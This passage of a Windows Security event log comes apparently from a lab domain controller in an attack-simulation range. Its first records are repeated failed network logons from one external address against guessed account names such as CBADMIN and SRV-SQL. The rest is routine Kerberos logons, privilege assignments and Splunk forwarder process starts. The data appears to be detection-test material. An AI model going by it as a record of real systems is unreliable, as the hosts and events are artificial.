Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Type: 3
Account For Which Logon Failed:
Security ID: NULL SID
Account Name: CBADMIN
Account Domain:
Failure Information:
Failure Reason: Unknown user name or bad password.
Status: 0xC000006D
Sub Status: 0xC0000064
Process Information:
Caller Process ID: 0x0
Caller Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 176.111.173.76
Source Port: 0
Detailed Authentication Information:
Logon Process: NtLmSsp
Authentication Package: NTLM
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon request fails. It is generated on the computer where access was attempted.
The Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).
The Process Information fields indicate which account and process on the system requested the logon.
The Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The authentication information fields provide detailed information about this specific logon request.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:50:19 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4625
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265005
Keywords=Audit Failure
Message=An account failed to log on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Type: 3
Account For Which Logon Failed:
Security ID: NULL SID
Account Name: SRV-SQL
Account Domain:
Failure Information:
Failure Reason: Unknown user name or bad password.
Status: 0xC000006D
Sub Status: 0xC0000064
Process Information:
Caller Process ID: 0x0
Caller Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 176.111.173.76
Source Port: 0
Detailed Authentication Information:
Logon Process: NtLmSsp
Authentication Package: NTLM
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon request fails. It is generated on the computer where access was attempted.
The Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).
The Process Information fields indicate which account and process on the system requested the logon.
The Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The authentication information fields provide detailed information about this specific logon request.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:50:23 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4625
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265006
Keywords=Audit Failure
Message=An account failed to log on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Type: 3
Account For Which Logon Failed:
Security ID: NULL SID
Account Name: SQLSYNC
Account Domain:
Failure Information:
Failure Reason: Unknown user name or bad password.
Status: 0xC000006D
Sub Status: 0xC0000064
Process Information:
Caller Process ID: 0x0
Caller Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 176.111.173.76
Source Port: 0
Detailed Authentication Information:
Logon Process: NtLmSsp
Authentication Package: NTLM
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon request fails. It is generated on the computer where access was attempted.
The Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).
The Process Information fields indicate which account and process on the system requested the logon.
The Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The authentication information fields provide detailed information about this specific logon request.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:50:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265009
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8A3577
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:50:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265008
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8A3577
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 53904
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:50:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265007
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8A3577
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:51:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265010
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a6c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:51:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265012
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b5c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:51:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265011
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1928
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:51:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265013
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x14c4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:51:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265015
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1570
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:51:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265014
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x18f4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:51:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265016
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1034
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:51:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265018
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8A620D
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {91CA8262-9E50-FD4E-69C1-B65F14ACC796}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 53909
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:51:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265017
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8A620D
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:51:23 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265020
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: ATTACKRANGE\WIN-DC-209$
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8A686A
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {52856D24-E7E4-800D-C1D5-890AF5C2B413}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:51:23 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265019
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: ATTACKRANGE\WIN-DC-209$
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8A686A
Privileges: SeAuditPrivilege
SeImpersonatePrivilege
SeAssignPrimaryTokenPrivilege
04/19/2021 03:51:31 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265021
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8A620D
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:51:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265024
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8A75A2
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:51:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265023
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8A75A2
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 64893
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:51:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265022
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8A75A2
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:52:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265025
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1510
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:52:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265027
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x544
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:52:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265026
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xad0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
